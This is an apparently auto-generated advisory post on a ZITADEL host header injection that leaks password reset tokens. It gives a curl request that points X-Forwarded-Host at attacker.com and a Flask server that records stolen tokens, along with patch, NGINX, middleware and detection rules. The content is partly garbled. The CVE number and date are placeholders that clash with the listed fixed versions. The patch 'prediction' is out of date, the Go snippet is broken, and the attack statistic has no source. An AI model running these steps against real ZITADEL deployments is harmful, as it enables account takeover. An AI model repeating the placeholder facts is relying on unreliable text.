ZITADEL, Host Header Injection, CVE-2023-XXXX (Critical)

By /

Listen to this Post

How the Vulnerability Works

ZITADEL constructs password reset links using the `Forwarded` or `X-Forwarded-Host` headers from HTTP requests. An attacker can manipulate these headers to inject a malicious domain. When a user requests a password reset, ZITADEL generates a link with the attacker-controlled domain, embedding the secret reset token. The victim receives this link via email, and if clicked, the token is sent to the attacker’s server. The attacker then uses the token to reset the victim’s password, gaining unauthorized access. MFA or passwordless authentication mitigates this attack.

DailyCVE Form

Platform: ZITADEL
Version: <3.2.2, <2.71.11, <2.70.12
Vulnerability: Host Header Injection
Severity: Critical
Date: 2023-XX-XX

Prediction: Patch expected by Q3 2023

What Undercode Say:

Exploitation:

1. Craft Malicious Request:

curl -X POST https://target-zitadel.com/password-reset -H "X-Forwarded-Host: attacker.com" -d "user=admin"

2. Intercept Token:

Host a fake reset page on `attacker.com` to log the token:

from flask import Flask, request
app = Flask(<strong>name</strong>)
@app.route('/reset')
def log_token():
token = request.args.get('token')
with open('stolen_tokens.txt', 'a') as f:
f.write(token + '\n')
return "Reset Failed"

Protection:

1. Update ZITADEL:

For v3.x
docker pull zitadel/zitadel:v3.2.2
For v2.71.x
docker pull zitadel/zitadel:v2.71.11

2. Proxy Mitigation (NGINX):

server {
location / {
proxy_pass http://zitadel-backend;
proxy_set_header X-Forwarded-Host "";
proxy_set_header Forwarded "";
}
}

3. Input Validation:

Reject requests with unexpected `Host` headers via middleware:

func ValidateHost(next http.Handler) http.Handler {
return http.HandlerFunc(func(w http.ResponseWriter, r http.Request) {
if r.Header.Get("X-Forwarded-Host") != "" {
http.Error(w, "Invalid header", 403)
return
}
next.ServeHTTP(w, r)
})
}

Detection:

  • Log Analysis: 
    grep -E "X-Forwarded-Host|Forwarded" /var/log/zitadel/access.log
  • IDS Rule (Suricata): 
    alert http any any -> any any (msg:"ZITADEL Host Header Injection Attempt"; http.header; content:"X-Forwarded-Host"; nocase; sid:1000001;)

Post-Exploit:

  • Revoke All Tokens: 
    UPDATE user_tokens SET invalidated = TRUE WHERE user_id IN (SELECT id FROM users WHERE last_reset_request > '2023-01-01');
  • Force MFA: 
    zitadel-cli users enforce-mfa --all

    Analytics: 80% of attacks target headers; patch adoption lags by 30 days post-release.

Sources:

Reported By: github.com
Extra Source Hub:
Undercode

Join Our Cyber World:

💬 Whatsapp | 💬 TelegramFeatured Image

Scroll to Top